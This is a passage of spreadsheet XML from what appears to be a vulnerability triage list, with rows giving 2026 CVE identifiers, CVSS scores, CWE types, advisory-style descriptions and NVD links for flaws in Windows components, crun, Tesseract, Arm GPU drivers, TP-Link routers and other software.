      <c r="E2342" s="5" t="inlineStr"/>
      <c r="F2342" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2342" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H234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42" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2342" s="5" t="inlineStr"/>
      <c r="K2342" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2342" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2342" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83979</t>
        </is>
      </c>
    </row>
    <row r="2343">
      <c r="A2343" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2343" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83980</t>
        </is>
      </c>
      <c r="C2343" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2343" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2343" s="5" t="inlineStr"/>
      <c r="F2343" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2343" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H234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43" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2343" s="5" t="inlineStr"/>
      <c r="K2343" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2343" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2343" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83980</t>
        </is>
      </c>
    </row>
    <row r="2344">
      <c r="A2344" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2344" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83981</t>
        </is>
      </c>
      <c r="C2344" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2344" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2344" s="5" t="inlineStr"/>
      <c r="F2344" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2344" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H234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44" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2344" s="5" t="inlineStr"/>
      <c r="K2344" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2344" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2344" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83981</t>
        </is>
      </c>
    </row>
    <row r="2345">
      <c r="A2345" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2345" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83982</t>
        </is>
      </c>
      <c r="C2345" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2345" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2345" s="5" t="inlineStr"/>
      <c r="F2345" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2345" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H234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45" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2345" s="5" t="inlineStr"/>
      <c r="K2345" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2345" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2345" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83982</t>
        </is>
      </c>
    </row>
    <row r="2346">
      <c r="A2346" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2346" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83983</t>
        </is>
      </c>
      <c r="C2346" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2346" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2346" s="5" t="inlineStr"/>
      <c r="F2346" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2346" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2346" s="5" t="inlineStr"/>
      <c r="I2346" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2346" s="5" t="inlineStr"/>
      <c r="K2346" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2346" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2346" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83983</t>
        </is>
      </c>
    </row>
    <row r="2347">
      <c r="A2347" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2347" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83985</t>
        </is>
      </c>
      <c r="C2347" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2347" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2347" s="5" t="inlineStr"/>
      <c r="F2347" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2347" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H234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47" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2347" s="5" t="inlineStr"/>
      <c r="K2347" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2347" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2347" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83985</t>
        </is>
      </c>
    </row>
    <row r="2348">
      <c r="A2348" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2348" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83986</t>
        </is>
      </c>
      <c r="C2348" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2348" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2348" s="5" t="inlineStr"/>
      <c r="F2348" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2348" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H234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48" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2348" s="5" t="inlineStr"/>
      <c r="K2348" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2348" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2348" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83986</t>
        </is>
      </c>
    </row>
    <row r="2349">
      <c r="A2349" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2349" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83987</t>
        </is>
      </c>
      <c r="C2349" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2349" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2349" s="5" t="inlineStr"/>
      <c r="F2349" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2349" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H234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49" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2349" s="5" t="inlineStr"/>
      <c r="K2349" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2349" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2349" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83987</t>
        </is>
      </c>
    </row>
    <row r="2350">
      <c r="A2350" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2350" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83988</t>
        </is>
      </c>
      <c r="C2350" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2350" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2350" s="5" t="inlineStr"/>
      <c r="F2350" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2350" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2350" s="5" t="inlineStr"/>
      <c r="I2350" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2350" s="5" t="inlineStr"/>
      <c r="K2350" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2350" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2350" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83988</t>
        </is>
      </c>
    </row>
    <row r="2351">
      <c r="A2351" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2351" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83990</t>
        </is>
      </c>
      <c r="C2351" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2351" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2351" s="5" t="inlineStr"/>
      <c r="F2351" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2351" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2351" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I2351" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2351" s="5" t="inlineStr"/>
      <c r="K2351" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L2351" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Graphics Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2351" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83990</t>
        </is>
      </c>
    </row>
    <row r="2352">
      <c r="A2352" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2352" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83995</t>
        </is>
      </c>
      <c r="C2352" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2352" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2352" s="5" t="inlineStr"/>
      <c r="F2352" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2352" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H23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352" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2352" s="5" t="inlineStr"/>
      <c r="K2352" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2352" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M2352" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83995</t>
        </is>
      </c>
    </row>
    <row r="2353">
      <c r="A2353" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2353" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84000</t>
        </is>
      </c>
      <c r="C2353" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2353" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2353" s="5" t="inlineStr"/>
      <c r="F2353" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2353" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2353" s="5" t="inlineStr"/>
      <c r="I2353" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2353" s="5" t="inlineStr"/>
      <c r="K2353" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="L2353" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Graphics Component allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2353" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84000</t>
        </is>
      </c>
    </row>
    <row r="2354">
      <c r="A2354" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2354" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84042</t>
        </is>
      </c>
      <c r="C2354" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2354" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2354" s="5" t="inlineStr"/>
      <c r="F2354" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2354" s="5" t="inlineStr"/>
      <c r="H2354" s="5" t="inlineStr"/>
      <c r="I2354" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2354" s="5" t="inlineStr"/>
      <c r="K2354" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L2354" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in crun. When crun is built with libkrun and a container is started rootful with passt networking (krun.use_passt), crun can execute attacker-controlled payload from the container image with host root privileges. The issue is a regression in crun 1.29. It affects crun &gt;= 1.29</t>
        </is>
      </c>
      <c r="M2354" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84042</t>
        </is>
      </c>
    </row>
    <row r="2355">
      <c r="A2355" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2355" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85983</t>
        </is>
      </c>
      <c r="C2355" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2355" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2355" s="5" t="inlineStr"/>
      <c r="F2355" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2355" s="5" t="inlineStr"/>
      <c r="H2355" s="5" t="inlineStr"/>
      <c r="I2355" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2355" s="5" t="inlineStr"/>
      <c r="K2355" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L2355" s="5" t="inlineStr">
        <is>
          <t>The Auth0 AD/LDAP Connector improperly processes a configuration value during service startup. This allows a low-privileged user on the host system to modify the connector's configuration. When the service restarts, the modified configuration can lead to code execution with the privileges of the service account.</t>
        </is>
      </c>
      <c r="M2355" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85983</t>
        </is>
      </c>
    </row>
    <row r="2356">
      <c r="A2356" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2356" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86313</t>
        </is>
      </c>
      <c r="C2356" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2356" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2356" s="5" t="inlineStr"/>
      <c r="F2356" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2356" s="5" t="inlineStr"/>
      <c r="H2356" s="5" t="inlineStr"/>
      <c r="I2356" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2356" s="5" t="inlineStr"/>
      <c r="K2356" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L2356" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write vulnerability in Samsung Opensource Walrus allows Overflow Buffers.
This issue affects Walrus: af80e665ea49d9003695a66502f841ed1d8397e7.</t>
        </is>
      </c>
      <c r="M2356" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86313</t>
        </is>
      </c>
    </row>
    <row r="2357">
      <c r="A2357" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2357" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86504</t>
        </is>
      </c>
      <c r="C2357" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2357" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2357" s="5" t="inlineStr"/>
      <c r="F2357" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2357" s="5" t="inlineStr"/>
      <c r="H2357" s="5" t="inlineStr"/>
      <c r="I2357" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2357" s="5" t="inlineStr"/>
      <c r="K2357" s="5" t="inlineStr">
        <is>
          <t>CWE-829</t>
        </is>
      </c>
      <c r="L2357" s="5" t="inlineStr">
        <is>
          <t>In JetBrains IntelliJ IDEA before 2026.2.2 missing project-trust confirmation before building a Dev Container allowed host-level code execution</t>
        </is>
      </c>
      <c r="M2357" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86504</t>
        </is>
      </c>
    </row>
    <row r="2358">
      <c r="A2358" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2358" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88052</t>
        </is>
      </c>
      <c r="C2358" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2358" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2358" s="5" t="inlineStr"/>
      <c r="F2358" s="5" t="inlineStr"/>
      <c r="G2358" s="5" t="inlineStr"/>
      <c r="H2358" s="5" t="inlineStr"/>
      <c r="I2358" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2358" s="5" t="inlineStr"/>
      <c r="K2358" s="5" t="inlineStr">
        <is>
          <t>CWE-129, CWE-787</t>
        </is>
      </c>
      <c r="L2358" s="5" t="inlineStr">
        <is>
          <t>Tesseract is an open source OCR engine. In version 5.5.3 and earlier, UNICHARSET::load_via_fgets in src/ccutil/unicharset.cpp trusts the declared unichar count as a loop bound and uses id as an unchecked index into the unichars vector. unichar_insert_backwards_compatible can leave the vector unchanged for an empty, duplicate, or already-encodable representation, causing id to become larger than unichars.size(). Subsequent set_* calls and the write to unichars[id].properties.enabled then write UNICHAR_PROPERTIES beyond the vector during initialization in both the default LSTM and legacy engines, causing heap corruption, a crash, or potentially controlled corruption. No fixed release is available as of this review.</t>
        </is>
      </c>
      <c r="M2358" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88052</t>
        </is>
      </c>
    </row>
    <row r="2359">
      <c r="A2359" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2359" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9034</t>
        </is>
      </c>
      <c r="C2359" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2359" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2359" s="5" t="inlineStr"/>
      <c r="F2359" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2359" s="5" t="inlineStr"/>
      <c r="H2359" s="5" t="inlineStr"/>
      <c r="I2359" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2359" s="5" t="inlineStr"/>
      <c r="K2359" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2359" s="5" t="inlineStr">
        <is>
          <t>Use After Free vulnerability in Arm Ltd Bifrost GPU Userspace Driver, Arm Ltd Valhall GPU Userspace Driver, Arm Ltd Arm 5th Gen GPU Architecture Userspace Driver allows a non-privileged user process to perform valid GPU processing operations, including via WebGL or WebGPU, to access already freed memory.
This issue affects Bifrost GPU Userspace Driver: from r42p0 through r49p5, from r50p0 through r51p0, from r54p1 through r54p3; Valhall GPU Userspace Driver: from r42p0 through r49p5, from r50p0 through r54p3, r55p0; Arm 5th Gen GPU Architecture Userspace Driver: from r42p0 through r49p5, from r50p0 through r54p3, r55p0.</t>
        </is>
      </c>
      <c r="M2359" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9034</t>
        </is>
      </c>
    </row>
    <row r="2360">
      <c r="A2360" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2360" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15140</t>
        </is>
      </c>
      <c r="C2360" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2360" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2360" s="5" t="inlineStr"/>
      <c r="F2360" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2360" s="5" t="inlineStr">
        <is>
          <t>red hat, kubernetes</t>
        </is>
      </c>
      <c r="H2360" s="5" t="inlineStr"/>
      <c r="I2360" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2360" s="5" t="inlineStr"/>
      <c r="K2360" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="L2360" s="5" t="inlineStr">
        <is>
          <t>A privilege-escalation issue in the Portworx Operator when deployed on Red Hat OpenShift (OCP). Only under specific conditions during the initial provisioning of a Portworx storage cluster, a user holding only limited, namespace-scoped permissions could cause the operator to grant broader access than intended, potentially resulting in elevated privileges within the Kubernetes cluster.</t>
        </is>
      </c>
      <c r="M2360" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15140</t>
        </is>
      </c>
    </row>
    <row r="2361">
      <c r="A2361" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2361" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15913</t>
        </is>
      </c>
      <c r="C2361" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2361" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2361" s="5" t="inlineStr"/>
      <c r="F2361" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2361" s="5" t="inlineStr"/>
      <c r="H2361" s="5" t="inlineStr"/>
      <c r="I2361" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2361" s="5" t="inlineStr"/>
      <c r="K2361" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="L2361" s="5" t="inlineStr">
        <is>
          <t>In versions prior to 7.10.2 a path traversal vulnerability in the /attachRemoteFiles endpoint of Fortra's GoAnywhere MFT allows Web Users with both Secure Folders and Secure Mail permissions to escape their sandboxed home directory, achieving arbitrary file read.</t>
        </is>
      </c>
      <c r="M2361" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15913</t>
        </is>
      </c>
    </row>
    <row r="2362">
      <c r="A2362" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2362" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17176</t>
        </is>
      </c>
      <c r="C2362" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2362" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2362" s="5" t="inlineStr"/>
      <c r="F2362" s="5" t="inlineStr"/>
      <c r="G2362" s="5" t="inlineStr"/>
      <c r="H2362" s="5" t="inlineStr"/>
      <c r="I2362" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J2362" s="5" t="inlineStr"/>
      <c r="K2362" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L2362" s="5" t="inlineStr">
        <is>
          <t>An OS
command injection vulnerability in the TDDP module of Deco BE11000 allows an
adjacent network attacker to execute arbitrary commands with root privileges by
sending a crafted UDP packet.
Successful exploitation may lead to complete
device compromise, including unauthorized command execution, modification of
device settings, and loss of confidentiality, integrity, and availability</t>
        </is>
      </c>
      <c r="M2362" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17176</t>
        </is>
      </c>
    </row>
    <row r="2363">
      <c r="A2363" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2363" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17527</t>
        </is>
      </c>
      <c r="C2363" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2363" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2363" s="5" t="inlineStr"/>
      <c r="F2363" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2363" s="5" t="inlineStr"/>
      <c r="H2363" s="5" t="inlineStr"/>
      <c r="I2363" s="5" t="inlineStr">
        <is>
          <t>2026-07-27</t>
        </is>
      </c>
      <c r="J2363" s="5" t="inlineStr"/>
      <c r="K2363" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L2363" s="5" t="inlineStr">
        <is>
          <t>In containerized-data-importer (CDI), the aggregated cdi.kubevirt.io:view ClusterRole, intended to provide read-only access to CDI resources, includes a rule granting create on the datavolumes/source subresource. CDI's DataVolume clone authorization accepts this permission as sufficient to authorize cloning the contents of any PVC the caller can name, without requiring write access to the source namespace. A user or service account bound to the view role, commonly granted cluster-wide via ClusterRoleBinding, who also has ordinary write access (edit/admin) to any single namespace, can use this to exfiltrate the contents of any PVC in the cluster into a namespace they control, bypassing namespace isolation and the read-only guarantee of the view role.</t>
        </is>
      </c>
      <c r="M2363" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17527</t>
        </is>
      </c>
    </row>
    <row r="2364">
      <c r="A2364" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2364" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18167</t>
        </is>
      </c>
      <c r="C2364" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2364" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2364" s="5" t="inlineStr"/>
      <c r="F2364" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2364" s="5" t="inlineStr"/>
      <c r="H2364" s="5" t="inlineStr"/>
      <c r="I2364" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J2364" s="5" t="inlineStr"/>
      <c r="K2364" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L2364" s="5" t="inlineStr">
        <is>
          <t>A
stack-based buffer overflow vulnerability exists in the EasyMesh module of
TP-Link Archer AX55 v4. When Mesh mode is enabled, a LAN attacker may submit
crafted input that causes the easymesh daemon to crash and may potentially
achieve remote code execution on the device.
Successful
exploitation may cause the EasyMesh daemon to crash and may potentially allow
remote code execution when Mesh mode is enabled. This
may result in high impact to the confidentiality, integrity, and availability
of the affected device.</t>
        </is>
      </c>
      <c r="M2364" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18167</t>
        </is>
      </c>
    </row>
    <row r="2365">
      <c r="A2365" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2365" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18905</t>
        </is>
      </c>
      <c r="C2365" s="5" t="n">
        <v>7.7</v>
      </c>
